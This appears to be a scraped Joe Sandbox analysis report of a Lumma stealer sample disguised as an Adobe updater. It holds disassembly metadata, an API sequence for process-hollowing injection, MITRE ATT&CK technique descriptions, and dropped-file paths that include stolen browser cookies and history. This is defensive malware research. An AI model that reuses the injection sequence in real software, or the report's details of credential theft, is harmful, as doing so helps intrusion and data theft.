Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: d30204814b506fab52d977ffb80f47f1a25403883c329681581ff446a6abe832
Instruction ID: fccb7507101f296c6a4d6a636527276f6ff1960b8d7486d5ce9c2838a1e76f99
Opcode Fuzzy Hash: d30204814b506fab52d977ffb80f47f1a25403883c329681581ff446a6abe832
Instruction Fuzzy Hash: FD11C4B66066157FAA2127765CCACBF6DECDF9F3947102424F502B9101EA64FE0045B1

Function 00EA93D5 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00EA81D1,00000000,00000001,00000000,00000000,?,00E9FF8B,00000000,00000000,00000000), ref: 00EA93EC
GetLastError.KERNEL32(?,00EA81D1,00000000,00000001,00000000,00000000,?,00E9FF8B,00000000,00000000,00000000,00000000,00000000,?,00EA0512,00000000), ref: 00EA93F8

Part of subcall function 00EA93BE: CloseHandle.KERNEL32(FFFFFFFE,00EA9408,?,00EA81D1,00000000,00000001,00000000,00000000,?,00E9FF8B,00000000,00000000,00000000,00000000,00000000), ref: 00EA93CE

___initconout.LIBCMT ref: 00EA9408

Part of subcall function 00EA9380: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00EA93AF,00EA81BE,00000000,?,00E9FF8B,00000000,00000000,00000000,00000000), ref: 00EA9393

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00EA81D1,00000000,00000001,00000000,00000000,?,00E9FF8B,00000000,00000000,00000000,00000000), ref: 00EA941D

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: ecd164d1deb0304c2a25974c7b04e45db12443a944d2cd0cffb3827c61d74d61
Instruction ID: 205d96b35783901114113a6298e81ec997b869b9955be43ace55178f2a52dea1
Opcode Fuzzy Hash: ecd164d1deb0304c2a25974c7b04e45db12443a944d2cd0cffb3827c61d74d61
Instruction Fuzzy Hash: 43F0303A401118BFCF221FA5DC049CD3F6BFF4E3A0F005010FA19A9171C632A921EB90

Function 00EA0BCD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132fileCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EA0C1D
ReadFile.KERNEL32(?,?,00001000,?,00000000,00EA0966,00000001,00000000,00E931FD,00000000,?,?,00000000,?,?,00EA0DE9), ref: 00EA0CA3

Strings

f, xrefs: 00EA0BE6

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: FileReadUnothrow_t@std@@@__ehfuncinfo$??2@
String ID: f
API String ID: 1834446548-3647721633
Opcode ID: 015e204f4a429be64435e1aa2ca838cb7ca65b26aad9600acf19bdcee34098b5
Instruction ID: 1f7687a8e49b74ca09466d5bac686fd3fa3f0823db06cc0705bb0b342e3bf1fe
Opcode Fuzzy Hash: 015e204f4a429be64435e1aa2ca838cb7ca65b26aad9600acf19bdcee34098b5
Instruction Fuzzy Hash: 8241E072A00258AFCF25CF68CC80BE9B7B5AB4D314F1491E9E549BA141D7B1FE81DB50

Function 00E97F8D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 00E97FB2

Strings

RCC, xrefs: 00E97FCC
MOC, xrefs: 00E97FC4

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 42fc11b7dbc811504849f03af79711e388ef704263ea7e538312962bbc0b31ed
Instruction ID: 6855c075d9a98adde1903ddad8be4f0de9cf324f9d42bb410bdaf18de300698e
Opcode Fuzzy Hash: 42fc11b7dbc811504849f03af79711e388ef704263ea7e538312962bbc0b31ed
Instruction Fuzzy Hash: 3641A972A00209AFDF26CF98CD85AEEBBB1FF49304F189059F904B7261D735A994CB50

Function 00E98922 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,00E98A9D,00000002,FlsGetValue,00EAEC68,FlsGetValue,00000000,?,00E9792D,?,00E95C62), ref: 00E989A5
GetProcAddress.KERNEL32(00000000,?), ref: 00E989AF

Strings

b\, xrefs: 00E98948

Memory Dump Source

Source File: 00000014.00000002.2284041271.0000000000E91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000014.00000002.2284020615.0000000000E90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284069703.0000000000EAD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284160412.0000000000EB7000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.2284571770.0000000000F05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_e90000_AdobeUpdaterV202.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: b\
API String ID: 3013587201-3493366257
Opcode ID: 69602aaeaa726d287e29851ec9efb280d28b38a81fef013e212caf0f7412a7ad
Instruction ID: 6808e52866b697250f53339f403fb3b5fead245f00947071f3569649fd7f0312
Opcode Fuzzy Hash: 69602aaeaa726d287e29851ec9efb280d28b38a81fef013e212caf0f7412a7ad
Instruction Fuzzy Hash: 1B11B135600115AFCF22CF64DD809B973A4FB8B3647142159EA0AF7220DF31ED01DB92

Analysis Process: AdobeUpdaterV202.exePID: 2852, Parent PID: 4004COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 005D018D Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 005D02FC
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 005D030F
Wow64GetThreadContext.KERNEL32(?,00000000), ref: 005D032D
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 005D0351
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 005D037C
WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 005D03D4
WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 005D041F
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 005D045D
Wow64SetThreadContext.KERNEL32(?,?), ref: 005D0499
ResumeThread.KERNELBASE(?), ref: 005D04A8

Strings

Load, xrefs: 005D01CB
aryA, xrefs: 005D01D3
GetP, xrefs: 005D020F
ress, xrefs: 005D0217

Memory Dump Source

Source File: 00000018.00000002.2362489227.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_5d0000_AdobeUpdaterV202.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: GetP$Load$aryA$ress
API String ID: 2687962208-977067982
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: f88b47602620910211152d09fab249978a5430b87debc69aa841de4be348c33c
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: A2B1E57664024AAFDB60CFA8CC80BDA77A5FF88714F158525EA0CEB341D774FA418B94

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report tMO4FVIc9l.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_tMO4FVIc9l.exe_be92bb1bff38c722ec185b4fdc72fbebbec7f39_390e5ac0_3dbca512-effe-4dee-98ea-d0774586cddc\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1E97.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER20AB.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER20DB.tmp.xml

C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\lumma2305[1].exe

C:\Users\user\AppData\Local\Temp\KBHGMwjOItm_DLNJJFRnML7.zip

C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\02zdBXl47cvzcookies.sqlite

C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\3P7JnOlL1OlXHistory

Windows Analysis Report
tMO4FVIc9l.exe

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre